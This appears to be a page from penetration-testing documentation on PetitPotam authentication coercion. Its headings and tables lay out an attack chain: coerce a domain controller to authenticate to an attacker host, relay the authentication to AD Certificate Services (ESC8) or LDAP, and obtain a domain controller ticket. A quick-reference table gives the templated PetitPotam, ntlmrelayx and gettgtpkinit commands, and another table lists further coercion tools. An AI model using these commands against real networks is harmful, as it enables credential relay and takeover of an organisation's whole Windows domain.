Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Abuse MS-EFSRPC to coerce target (typically DC) to authenticate to attacker. Relay authentication to ADCS (ESC8) or LDAP for domain takeover.Coerce Authentication
Unauthenticated (Unpatched)
Authenticated
Relay to ADCS (ESC8) — Full Domain Takeover
Setup ntlmrelayx
Trigger PetitPotam
Use Certificate
Relay to LDAP (RBCD)
Other Coercion Methods
| Tool | Protocol |
|---|---|
| PetitPotam | MS-EFSRPC |
| PrinterBug / SpoolSample | MS-RPRN |
| DFSCoerce | MS-DFSNM |
| ShadowCoerce | MS-FSRVP |
PrinterBug
DFSCoerce
Quick Reference
| Step | Command |
|---|---|
| Coerce | PetitPotam.py ATTACKER DC_IP |
| Relay ADCS | ntlmrelayx -t http://CA/certsrv/... --adcs |
| Relay LDAP | ntlmrelayx -t ldap://DC --delegate-access |
| Get TGT | gettgtpkinit.py DOMAIN/'DC$' dc.ccache -cert-pfx dc.pfx |